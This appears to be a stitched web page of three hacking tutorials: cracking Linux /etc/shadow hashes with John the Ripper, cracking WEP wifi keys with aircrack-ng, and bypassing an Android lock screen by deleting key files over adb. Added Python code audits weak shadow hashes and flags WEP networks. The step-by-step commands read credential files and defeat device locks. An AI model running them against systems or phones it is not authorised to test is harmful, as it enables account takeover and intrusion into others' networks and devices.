
How to Crack User Passwords in a Linux System

In recent posts, I've demonstrated how to grab password hashes remotely using Metasploit's meterpreter and pwdump. Once we have the Windows password hashes from the SAM file, we can crack them using tools such as Cain and Abel.
In this article, we'll look at how to grab the password hashes from a Linux system and crack them using probably the most widely used password cracking tool out there, John the Ripper.
Let's boot up BackTrack and get hacking!

Where Linux Passwords Are Stored

Linux passwords are stored in the /etc/passwd file in cleartext on older systems and in the /etc/shadow file in hashed form on newer systems. On anything other than an old legacy system, we should expect the passwords to be stored in /etc/shadow.

Step 1: Create Some User Accounts

Since our BackTrack system probably doesn't have many users on it other than our root account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".
I've purposely chosen dictionary words, since the time needed to crack a password grows with its complexity. One of the nice features of John the Ripper is that it will try a dictionary attack first. If that fails, it will try a hybrid attack, and only if that fails will it attempt a brute-force attack, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we need to open John the Ripper. John the Ripper is a simple but powerful password cracker without a GUI (this helps to make it faster, as GUIs consume resources).
We can access it from BackTrack by going to the BackTrack button on the bottom left, then Backtrack > Privilege Escalation > Password Attacks > Offline Attacks, and finally selecting John the Ripper from the multiple password cracking tools available.
If you selected the correct menu item, it will open a terminal that looks like this.
By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:
  • bt > john -test
This command will send John the Ripper through a variety of benchmark tests to estimate how fast it can attack each hash format on your system. Your terminal will look something like this.
Now that John has benchmarked each of the hash formats, let's put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our current directory along with the /etc/passwd file, then "unshadow" them and store the result in a file we'll call passwords. So, let's type both:
  • bt > cp /etc/shadow ./
  • bt > cp /etc/passwd ./
In Linux, the cp command means copy and ./ represents our current directory. So this command says: copy /etc/shadow to my current directory. We do the same for the /etc/passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that John can do its magic.
  • bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.
  • bt > john passwords
John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked all three of ours in a matter of seconds! Of course, more complex passwords will take significantly more time, but all we need is just one user with a simple password and we have access to the account in seconds.
It's also important to note that any password cracker is only as good as its word list. For more complex or hybrid passwords, you probably want to use a password list containing far more passwords, including hybrid passwords such as "p@$$w0rd" that combine special characters into words.
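To look at the same files from the defender's side, here is an added Python audit (not code from the original post): it joins constructed passwd/shadow sample lines by user name the way unshadow does, classifies each shadow hash by its crypt(3) prefix, and reports the login-capable accounts whose empty or legacy hash an offline run like the one above would get through first. The account names and hash values are made up.

```python
# Constructed sample data in /etc/passwd and /etc/shadow format (not from a real host).
SAMPLE_PASSWD = """\
user1:x:1000:1000:User One:/home/user1:/bin/bash
user2:x:1001:1001:User Two:/home/user2:/bin/bash
legacy:x:1002:1002:Old Account:/home/legacy:/bin/sh
guest:x:1003:1003:Guest:/home/guest:/bin/bash
"""
SAMPLE_SHADOW = """\
user1:$y$j9T$saltsaltsalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASH:19000:0:99999:7:::
user2:$1$saltsalt$FAKEHASHFAKEHASHFAKEHA:19000:0:99999:7:::
legacy:abJnggxhB/yWI:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""
# crypt(3) scheme prefixes; an offline cracker gets through the cheap schemes fastest.
HASH_TYPES = {"$1$": ("md5crypt", "weak"), "$2b$": ("bcrypt", "ok"), "$5$": ("sha256crypt", "ok"),
              "$6$": ("sha512crypt", "ok"), "$7$": ("scrypt", "ok"), "$y$": ("yescrypt", "ok")}

def classify_hash(field):
    """Return (scheme, strength) for one shadow password field."""
    if not field:                     # "" = no password at all; None = absent from shadow
        return ("empty", "critical") if field == "" else ("missing", "review")
    if field.startswith(("!", "*")):
        return ("locked", "none")     # password login disabled
    for prefix, info in HASH_TYPES.items():
        if field.startswith(prefix):
            return info
    if len(field) == 13 and not field.startswith("$"):
        return ("descrypt", "weak")   # legacy DES crypt: 8-char limit, 12-bit salt
    return ("unknown", "review")

def merge(passwd_text, shadow_text):
    """Pair each passwd entry with its shadow hash, the join that `unshadow` performs."""
    shadow = dict(line.split(":", 2)[:2] for line in shadow_text.splitlines() if line.strip())
    users = []
    for line in passwd_text.splitlines():
        if line.strip():
            f = line.split(":")
            users.append({"name": f[0], "shell": f[6], "hash": shadow.get(f[0])})
    return users

def audit(passwd_text, shadow_text):
    """Report login-capable accounts whose hash an offline attack would get through fastest."""
    findings = []
    for u in merge(passwd_text, shadow_text):
        scheme, strength = classify_hash(u["hash"])
        if strength in ("critical", "weak") and not u["shell"].endswith(("nologin", "/false")):
            findings.append((u["name"], scheme, strength))
    return findings
```

On a real host the same audit runs as root over the actual /etc/passwd and /etc/shadow; anything it reports is a candidate for a forced password change or a move to a modern hash scheme.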

Crack Wifi Password (WEP) with Kali Linux

We can easily crack Wifi (WEP security) using Kali Linux in approximately 10-15 minutes by following the steps given below.

Open a terminal and follow this procedure:

Steps:

1. Find out the name of your wireless adapter by typing:
    ifconfig

2. Enable Monitor mode by typing:
    airmon-ng start wlan0

3. Start capturing packets by typing:
    airodump-ng mon0

4. Store the captured packets in a file by typing:
    airodump-ng mon0 --write name_of_file

5. Once at least 10000 packets have been captured, crack the key by typing:
    aircrack-ng name_of_file-01.cap



Note:
1. Only WEP wifi passwords can be cracked using these steps.
2. If you have any problem, comment below.
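As an added example from the defender's side (not code from the original post): a Python check that flags WEP and open networks in a wifi scan listing, plus the birthday-bound estimate of why a few thousand frames are enough against WEP's 24-bit RC4 IV. The scan text is a constructed sample in the shape of `nmcli -t -f SSID,SECURITY dev wifi list` output; the SSIDs and the exact field values are assumptions.

```python
import math
import re

# Constructed sample of `nmcli -t -f SSID,SECURITY dev wifi list` output (terse mode is
# colon-separated; a literal colon inside a field is escaped as "\:"). Not a real scan.
SAMPLE_NMCLI = """\
HomeNet:WPA2
Cafe\\:Guest:WEP
Legacy-AP:WEP
OpenHotspot:
Office:WPA1 WPA2
Modern:WPA3
"""

def split_terse(line):
    """Split one nmcli terse line on unescaped colons and unescape the fields."""
    return [f.replace("\\:", ":") for f in re.split(r"(?<!\\):", line)]

def weak_networks(nmcli_output):
    """Return (ssid, reason) for networks that give no real confidentiality."""
    flagged = []
    for line in nmcli_output.splitlines():
        if not line.strip():
            continue
        ssid, security = split_terse(line)[:2]
        sec = security.strip()
        if sec in ("", "--"):
            flagged.append((ssid, "open: no encryption at all"))
        elif "WEP" in sec.split():
            flagged.append((ssid, "WEP: 24-bit IVs, key recoverable from captured traffic"))
    return flagged

def iv_reuse_probability(frames, iv_bits=24):
    """Birthday-bound probability that at least one RC4 IV (and so one keystream) repeats
    after `frames` frames with uniformly random IVs. aircrack-ng relies on stronger
    statistical (FMS/PTW) attacks, but the tiny IV space is the root weakness."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))
```

At the 10000 frames the steps above wait for, the chance of at least one IV repeat is already about 95%; the only real fix for a flagged network is moving it to WPA2 or WPA3.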

Bypassing Android Lock Screen using Linux

Linux Terminal and adb tools

What You Need:

  1. A computer running a Linux distro or Windows+Cygwin
  2. USB cable to connect your phone to the PC
  3. Adb installed


How to install adb:

  1. Open Terminal
  2. Type:
    sudo apt-get install android-tools-adb
  3. Hit [Enter] and follow the instructions until everything is installed.


INSTRUCTIONS:

  1. Connect your (turned on) phone to the computer via USB.
  2. Open a terminal window.
  3. Type:
    adb devices
    adb shell
    cd /data/system
    su
    rm *.key
  4. Reboot the phone.


If you followed the steps properly, you have successfully bypassed the Android lock screen.


Note: Do not use this trick to trespass on someone's privacy, which is a punishable crime.